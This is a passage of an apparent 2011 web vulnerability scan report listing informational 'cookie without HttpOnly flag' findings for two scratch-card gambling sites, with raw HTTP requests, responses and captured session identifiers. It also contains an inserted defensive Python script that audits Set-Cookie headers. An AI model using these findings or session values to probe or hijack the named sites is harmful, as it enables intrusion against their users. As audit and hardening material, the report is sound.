Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.319. http://www.primescratchcards.com/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.320. http://www.primescratchcards.com/underage.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.321. http://www.scratch2cash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: CSI_1, RegistrationMode, BO, UniqueVisitorID, LanguageCode, CountryCode, CSITemp. (The ASP.NET_SessionId session cookie in the same response is flagged HttpOnly.) The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:42:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ot1ghj45nru51srozltshq55; path=/; HttpOnly
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 11:42:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 43974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
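The check Burp applies in each of these entries can be reproduced offline. The script below is an added example written for this page; it is not part of the XSS.CX report or of either site's code. It parses the Set-Cookie headers of a raw HTTP response, reports which cookies lack HttpOnly (and Secure), flags names that look like session identifiers, and shows what a hardened header value looks like. The sample response is constructed from the Set-Cookie lines of the scratch2cash.com entry above with the body cut short; the function names, the SESSION_NAME_HINTS list and the Secure check are assumptions of the example.

```python
"""Audit Set-Cookie headers for missing HttpOnly / Secure flags.

Added example for this page; not part of the XSS.CX report or of either
site's code. SAMPLE_RESPONSE is constructed from the Set-Cookie lines of
the scratch2cash.com entry above (body truncated). The function names,
SESSION_NAME_HINTS and the Secure check are the example's own.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Substrings that usually mark a session/auth cookie. A missing HttpOnly on one
# of these is the case that matters most when a reflected XSS is also present.
SESSION_NAME_HINTS = ("session", "sessid", "sid", "token", "auth")


@dataclass
class CookieAudit:
    name: str
    httponly: bool
    secure: bool
    domain: Optional[str]
    expires: Optional[str]
    looks_like_session: bool


def parse_set_cookie(header_value: str) -> CookieAudit:
    """Split one Set-Cookie value into its name and attribute flags.

    Only the first '=' of the leading pair is significant, so a value such as
    CSI_1=a=b&c=d survives intact. Attribute names are matched
    case-insensitively, as RFC 6265 requires.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, value = part.partition("=")
            attrs[key.strip().lower()] = value.strip()  # bare flags get ""
    lname = name.lower()
    return CookieAudit(
        name=name,
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        domain=attrs.get("domain"),
        expires=attrs.get("expires"),
        looks_like_session=any(h in lname for h in SESSION_NAME_HINTS),
    )


def audit_response(raw_response: str) -> List[CookieAudit]:
    """Audit every Set-Cookie header in a raw HTTP/1.1 response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    audits = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        hname, _, hvalue = line.partition(":")
        if hname.strip().lower() == "set-cookie":
            audits.append(parse_set_cookie(hvalue.strip()))
    return audits


def missing_httponly(raw_response: str) -> List[str]:
    """Names of cookies set without HttpOnly, in response order."""
    return [c.name for c in audit_response(raw_response) if not c.httponly]


def harden(header_value: str, secure: bool = True) -> str:
    """Return the Set-Cookie value with HttpOnly (and Secure) appended if absent."""
    audit = parse_set_cookie(header_value)
    out = header_value.strip().rstrip(";")
    if not audit.httponly:
        out += "; HttpOnly"
    if secure and not audit.secure:
        out += "; Secure"
    return out


# Constructed from the 12.321 response above; body cut to the DOCTYPE line.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Cache-Control: private",
    "Date: Mon, 16 May 2011 11:42:49 GMT",
    "Content-Type: text/html; charset=utf-8",
    "Server: Microsoft-IIS/6.0",
    "Set-Cookie: ASP.NET_SessionId=ot1ghj45nru51srozltshq55; path=/; HttpOnly",
    "Set-Cookie: CSI_1=EncryptedUniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8"
    "&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference="
    "&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com;"
    " expires=Fri, 16-May-2031 11:42:49 GMT; path=/",
    "Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/",
    "Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/",
    "Set-Cookie: UniqueVisitorID=7728334C6E196A0BB0F376210F5CF8E8; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/",
    "Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/",
    "Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 11:42:49 GMT; path=/",
    "Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/",
    "Content-Length: 43974",
    "",
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">',
])


if __name__ == "__main__":
    for c in audit_response(SAMPLE_RESPONSE):
        flags = ("HttpOnly" if c.httponly else "-") + "/" + ("Secure" if c.secure else "-")
        tag = "  <- session-like" if c.looks_like_session else ""
        print(f"{c.name:20s} {flags:17s} domain={c.domain}{tag}")
    print("missing HttpOnly:", ", ".join(missing_httponly(SAMPLE_RESPONSE)))
```

Run as a script it prints one line per cookie and then the list Burp would have produced for this response. Two caveats on the flag itself: HttpOnly only stops script from reading document.cookie, so a reflected XSS on the same origin can still drive the session by issuing requests from the victim's browser; and a cookie scoped with domain=scratch2cash.com is sent to every subdomain, so any XSS on a sibling host reaches it. The Secure check only matters once the site is served over TLS; every request in this report is plain HTTP. On the stacks shown here the fix is small: ASP.NET 2.0 honours <httpCookies httpOnlyCookies="true"/> under system.web in web.config, and classic ASP's Response.Cookies collection has no HttpOnly property, so a cookie like ARC on the IIS 6 site would have to be written with Response.AddHeader "Set-Cookie", "ARC=...; path=/; HttpOnly".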

12.322. http://www.scratch2cash.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.323. http://www.scratch2cash.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:03 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.324. http://www.scratch2cash.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.325. http://www.scratch2cash.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.326. http://www.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.327. http://www.scratch2cash.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.328. http://www.scratch2cash.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.329. http://www.scratch2cash.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.330. http://www.scratch2cash.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
